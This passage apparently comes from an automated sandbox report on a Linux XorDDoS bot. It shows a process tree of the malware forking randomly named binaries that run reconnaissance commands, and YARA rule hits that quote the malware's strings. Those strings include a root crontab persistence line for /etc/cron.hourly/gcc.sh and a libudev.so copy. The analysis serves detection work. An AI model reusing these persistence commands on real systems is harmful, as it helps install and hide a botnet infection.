      • dkuidbsedp New Fork (PID: 10831, Parent: 9446)
        • chvtxqzhiw (PID: 10834, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw top 9446
      • dkuidbsedp New Fork (PID: 10870, Parent: 9446)
        • qwevskbjgs (PID: 10871, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs su 9446
      • dkuidbsedp New Fork (PID: 10872, Parent: 9446)
        • qwevskbjgs (PID: 10874, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs "route -n" 9446
      • dkuidbsedp New Fork (PID: 10875, Parent: 9446)
        • qwevskbjgs (PID: 10877, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs pwd 9446
      • dkuidbsedp New Fork (PID: 10879, Parent: 9446)
        • qwevskbjgs (PID: 10882, Parent: 10879, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs uptime 9446
      • dkuidbsedp New Fork (PID: 10886, Parent: 9446)
        • qwevskbjgs (PID: 10889, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 10925, Parent: 9446)
        • kztofeuxtk (PID: 10926, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk su 9446
      • dkuidbsedp New Fork (PID: 10927, Parent: 9446)
        • kztofeuxtk (PID: 10928, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 10930, Parent: 9446)
        • kztofeuxtk (PID: 10931, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk who 9446
      • dkuidbsedp New Fork (PID: 10932, Parent: 9446)
        • kztofeuxtk (PID: 10933, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 10934, Parent: 9446)
        • kztofeuxtk (PID: 10938, Parent: 10934, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk uptime 9446
      • dkuidbsedp New Fork (PID: 10980, Parent: 9446)
        • tihvbqlbyh (PID: 10981, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh ifconfig 9446
      • dkuidbsedp New Fork (PID: 10982, Parent: 9446)
        • tihvbqlbyh (PID: 10984, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh sh 9446
      • dkuidbsedp New Fork (PID: 10985, Parent: 9446)
        • tihvbqlbyh (PID: 10988, Parent: 10985, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh su 9446
      • dkuidbsedp New Fork (PID: 10991, Parent: 9446)
        • tihvbqlbyh (PID: 10995, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 11000, Parent: 9446)
        • tihvbqlbyh (PID: 11004, Parent: 11000, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 11035, Parent: 9446)
        • evsgasjgju (PID: 11036, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 11037, Parent: 9446)
        • evsgasjgju (PID: 11039, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju id 9446
      • dkuidbsedp New Fork (PID: 11041, Parent: 9446)
        • evsgasjgju (PID: 11043, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju who 9446
      • dkuidbsedp New Fork (PID: 11045, Parent: 9446)
        • evsgasjgju (PID: 11050, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju "route -n" 9446
      • dkuidbsedp New Fork (PID: 11051, Parent: 9446)
        • evsgasjgju (PID: 11055, Parent: 11051, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju whoami 9446
      • dkuidbsedp New Fork (PID: 11100, Parent: 9446)
        • jyfcwmvcim (PID: 11101, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim pwd 9446
      • dkuidbsedp New Fork (PID: 11102, Parent: 9446)
        • jyfcwmvcim (PID: 11103, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim whoami 9446
      • dkuidbsedp New Fork (PID: 11104, Parent: 9446)
        • jyfcwmvcim (PID: 11105, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11106, Parent: 9446)
        • jyfcwmvcim (PID: 11109, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim id 9446
      • dkuidbsedp New Fork (PID: 11110, Parent: 9446)
        • jyfcwmvcim (PID: 11114, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim ifconfig 9446
      • dkuidbsedp New Fork (PID: 11155, Parent: 9446)
        • nwaorjvecz (PID: 11156, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 11157, Parent: 9446)
        • nwaorjvecz (PID: 11158, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 11159, Parent: 9446)
        • nwaorjvecz (PID: 11160, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 11161, Parent: 9446)
        • nwaorjvecz (PID: 11163, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 11164, Parent: 9446)
        • nwaorjvecz (PID: 11167, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz uptime 9446
      • dkuidbsedp New Fork (PID: 11210, Parent: 9446)
        • cqsoclzfrt (PID: 11211, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt whoami 9446
      • dkuidbsedp New Fork (PID: 11212, Parent: 9446)
        • cqsoclzfrt (PID: 11213, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 11214, Parent: 9446)
        • cqsoclzfrt (PID: 11215, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt pwd 9446
      • dkuidbsedp New Fork (PID: 11216, Parent: 9446)
        • cqsoclzfrt (PID: 11218, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt who 9446
      • dkuidbsedp New Fork (PID: 11219, Parent: 9446)
        • cqsoclzfrt (PID: 11222, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt su 9446
      • dkuidbsedp New Fork (PID: 11267, Parent: 9446)
        • udrzmjfbgf (PID: 11268, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf pwd 9446
      • dkuidbsedp New Fork (PID: 11269, Parent: 9446)
        • udrzmjfbgf (PID: 11270, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf top 9446
      • dkuidbsedp New Fork (PID: 11271, Parent: 9446)
        • udrzmjfbgf (PID: 11272, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf top 9446
      • dkuidbsedp New Fork (PID: 11273, Parent: 9446)
        • udrzmjfbgf (PID: 11274, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf su 9446
      • dkuidbsedp New Fork (PID: 11275, Parent: 9446)
        • udrzmjfbgf (PID: 11278, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 11322, Parent: 9446)
        • qwgryggbpq (PID: 11323, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq whoami 9446
      • dkuidbsedp New Fork (PID: 11324, Parent: 9446)
        • qwgryggbpq (PID: 11325, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq whoami 9446
      • dkuidbsedp New Fork (PID: 11326, Parent: 9446)
        • qwgryggbpq (PID: 11327, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq uptime 9446
      • dkuidbsedp New Fork (PID: 11328, Parent: 9446)
        • qwgryggbpq (PID: 11329, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11330, Parent: 9446)
        • qwgryggbpq (PID: 11331, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq "ls -la" 9446
      • dkuidbsedp New Fork (PID: 11377, Parent: 9446)
        • thqvayvyih (PID: 11378, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih whoami 9446
      • dkuidbsedp New Fork (PID: 11379, Parent: 9446)
        • thqvayvyih (PID: 11380, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih uptime 9446
      • dkuidbsedp New Fork (PID: 11381, Parent: 9446)
        • thqvayvyih (PID: 11382, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 11383, Parent: 9446)
        • thqvayvyih (PID: 11384, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "route -n" 9446
      • dkuidbsedp New Fork (PID: 11385, Parent: 9446)
        • thqvayvyih (PID: 11386, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 11432, Parent: 9446)
        • fcpzadqmpt (PID: 11433, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11434, Parent: 9446)
        • fcpzadqmpt (PID: 11435, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 11436, Parent: 9446)
        • fcpzadqmpt (PID: 11437, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 11438, Parent: 9446)
        • fcpzadqmpt (PID: 11439, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 11440, Parent: 9446)
        • fcpzadqmpt (PID: 11441, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt whoami 9446
      • dkuidbsedp New Fork (PID: 11487, Parent: 9446)
        • ibtfyvoofm (PID: 11488, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 11489, Parent: 9446)
        • ibtfyvoofm (PID: 11490, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm bash 9446
      • dkuidbsedp New Fork (PID: 11491, Parent: 9446)
        • ibtfyvoofm (PID: 11492, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 11493, Parent: 9446)
        • ibtfyvoofm (PID: 11494, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "route -n" 9446
      • dkuidbsedp New Fork (PID: 11495, Parent: 9446)
        • ibtfyvoofm (PID: 11497, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 11542, Parent: 9446)
        • tlayyibcia (PID: 11543, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 11544, Parent: 9446)
        • tlayyibcia (PID: 11545, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia who 9446
      • dkuidbsedp New Fork (PID: 11546, Parent: 9446)
        • tlayyibcia (PID: 11547, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 11548, Parent: 9446)
        • tlayyibcia (PID: 11550, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11551, Parent: 9446)
        • tlayyibcia (PID: 11553, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia pwd 9446
      • dkuidbsedp New Fork (PID: 11597, Parent: 9446)
        • dzlsbdiinr (PID: 11598, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 11599, Parent: 9446)
        • dzlsbdiinr (PID: 11600, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 11601, Parent: 9446)
        • dzlsbdiinr (PID: 11602, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11603, Parent: 9446)
        • dzlsbdiinr (PID: 11604, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr top 9446
      • dkuidbsedp New Fork (PID: 11605, Parent: 9446)
        • dzlsbdiinr (PID: 11607, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr pwd 9446
      • dkuidbsedp New Fork (PID: 11652, Parent: 9446)
        • qwdfhkhfeq (PID: 11653, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq bash 9446
      • dkuidbsedp New Fork (PID: 11654, Parent: 9446)
        • qwdfhkhfeq (PID: 11655, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq sh 9446
      • dkuidbsedp New Fork (PID: 11656, Parent: 9446)
        • qwdfhkhfeq (PID: 11657, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 11658, Parent: 9446)
        • qwdfhkhfeq (PID: 11660, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 11661, Parent: 9446)
        • qwdfhkhfeq (PID: 11664, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq "route -n" 9446
      • dkuidbsedp New Fork (PID: 11707, Parent: 9446)
        • ldaqsdrmbu (PID: 11708, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 11709, Parent: 9446)
        • ldaqsdrmbu (PID: 11710, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11711, Parent: 9446)
        • ldaqsdrmbu (PID: 11712, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu id 9446
      • dkuidbsedp New Fork (PID: 11713, Parent: 9446)
        • ldaqsdrmbu (PID: 11714, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu top 9446
      • dkuidbsedp New Fork (PID: 11715, Parent: 9446)
        • ldaqsdrmbu (PID: 11717, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "route -n" 9446
      • dkuidbsedp New Fork (PID: 11762, Parent: 9446)
        • wuipuaslsy (PID: 11763, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy su 9446
      • dkuidbsedp New Fork (PID: 11764, Parent: 9446)
        • wuipuaslsy (PID: 11765, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy pwd 9446
      • dkuidbsedp New Fork (PID: 11766, Parent: 9446)
        • wuipuaslsy (PID: 11767, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy top 9446
      • dkuidbsedp New Fork (PID: 11768, Parent: 9446)
        • wuipuaslsy (PID: 11769, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 11770, Parent: 9446)
        • wuipuaslsy (PID: 11772, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 11817, Parent: 9446)
        • uvaewfcsxa (PID: 11818, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa who 9446
      • dkuidbsedp New Fork (PID: 11819, Parent: 9446)
        • uvaewfcsxa (PID: 11820, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 11821, Parent: 9446)
        • uvaewfcsxa (PID: 11822, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa sh 9446
      • dkuidbsedp New Fork (PID: 11823, Parent: 9446)
        • uvaewfcsxa (PID: 11825, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa whoami 9446
      • dkuidbsedp New Fork (PID: 11826, Parent: 9446)
        • uvaewfcsxa (PID: 11827, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa bash 9446
      • dkuidbsedp New Fork (PID: 11872, Parent: 9446)
        • bbynnggifo (PID: 11873, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo "route -n" 9446
      • dkuidbsedp New Fork (PID: 11874, Parent: 9446)
        • bbynnggifo (PID: 11875, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo whoami 9446
      • dkuidbsedp New Fork (PID: 11876, Parent: 9446)
        • bbynnggifo (PID: 11877, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo ifconfig 9446
      • dkuidbsedp New Fork (PID: 11878, Parent: 9446)
        • bbynnggifo (PID: 11880, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 11881, Parent: 9446)
        • bbynnggifo (PID: 11884, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo ifconfig 9446
      • dkuidbsedp New Fork (PID: 11929, Parent: 9446)
        • lcbdpulcrs (PID: 11930, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 11931, Parent: 9446)
        • lcbdpulcrs (PID: 11932, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 11933, Parent: 9446)
        • lcbdpulcrs (PID: 11934, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs who 9446
      • dkuidbsedp New Fork (PID: 11935, Parent: 9446)
        • lcbdpulcrs (PID: 11938, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs ls 9446
      • dkuidbsedp New Fork (PID: 11939, Parent: 9446)
        • lcbdpulcrs (PID: 11941, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 11984, Parent: 9446)
        • vrbpjcuukk (PID: 11985, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 11986, Parent: 9446)
        • vrbpjcuukk (PID: 11987, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk su 9446
      • dkuidbsedp New Fork (PID: 11988, Parent: 9446)
        • vrbpjcuukk (PID: 11989, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "ls -la" 9446
      • dkuidbsedp New Fork (PID: 11990, Parent: 9446)
        • vrbpjcuukk (PID: 11992, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk bash 9446
      • dkuidbsedp New Fork (PID: 11993, Parent: 9446)
        • vrbpjcuukk (PID: 11996, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 12039, Parent: 9446)
        • potliirubi (PID: 12040, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 12041, Parent: 9446)
        • potliirubi (PID: 12042, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 12043, Parent: 9446)
        • potliirubi (PID: 12044, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi su 9446
      • dkuidbsedp New Fork (PID: 12045, Parent: 9446)
        • potliirubi (PID: 12047, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 12048, Parent: 9446)
        • potliirubi (PID: 12051, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 12094, Parent: 9446)
        • qvavyybczk (PID: 12095, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk whoami 9446
      • dkuidbsedp New Fork (PID: 12096, Parent: 9446)
        • qvavyybczk (PID: 12097, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk uptime 9446
      • dkuidbsedp New Fork (PID: 12098, Parent: 9446)
        • qvavyybczk (PID: 12099, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk uptime 9446
      • dkuidbsedp New Fork (PID: 12100, Parent: 9446)
        • qvavyybczk (PID: 12102, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 12103, Parent: 9446)
        • qvavyybczk (PID: 12104, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk who 9446
  • cleanup
SourceRuleDescriptionAuthorStrings
dkuidbsedpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    dkuidbsedpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
    • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
    • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
    • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
    dkuidbsedpXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
    • 0x6b0c4:$st0: BB2FA36AAA9541F0
    • 0x6b0d4:$st0: BB2FA36AAA9541F0
    • 0x6b0e4:$st0: BB2FA36AAA9541F0
    • 0x6b0f4:$st0: BB2FA36AAA9541F0
    • 0x6b104:$st0: BB2FA36AAA9541F0
    • 0x6b114:$st0: BB2FA36AAA9541F0
    • 0x6b124:$st0: BB2FA36AAA9541F0
    • 0x6b134:$st0: BB2FA36AAA9541F0
    • 0x6b144:$st0: BB2FA36AAA9541F0
    • 0x6b154:$st0: BB2FA36AAA9541F0
    • 0x6b164:$st0: BB2FA36AAA9541F0
    • 0x6b174:$st0: BB2FA36AAA9541F0
    • 0x6b184:$st0: BB2FA36AAA9541F0
    • 0x6b194:$st0: BB2FA36AAA9541F0
    • 0x6b1a4:$st0: BB2FA36AAA9541F0
    • 0x6b1b4:$st0: BB2FA36AAA9541F0
    • 0x6b1c4:$st0: BB2FA36AAA9541F0
    • 0x6b1d4:$st0: BB2FA36AAA9541F0
    • 0x6b1e4:$st0: BB2FA36AAA9541F0
    • 0x6b1f4:$st0: BB2FA36AAA9541F0
    • 0x6b204:$st0: BB2FA36AAA9541F0
    SourceRuleDescriptionAuthorStrings
    /usr/bin/zetazkptwuJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/zetazkptwuMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
      • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
      • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
      • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
      • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
      /usr/bin/tudlcvpgbcJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        /usr/bin/tudlcvpgbcMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
        • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
        • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
        • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
        • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
        /usr/bin/tudlcvpgbcXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
        • 0x6b0c4:$st0: BB2FA36AAA9541F0
        • 0x6b0d4:$st0: BB2FA36AAA9541F0
        • 0x6b0e4:$st0: BB2FA36AAA9541F0
        • 0x6b0f4:$st0: BB2FA36AAA9541F0
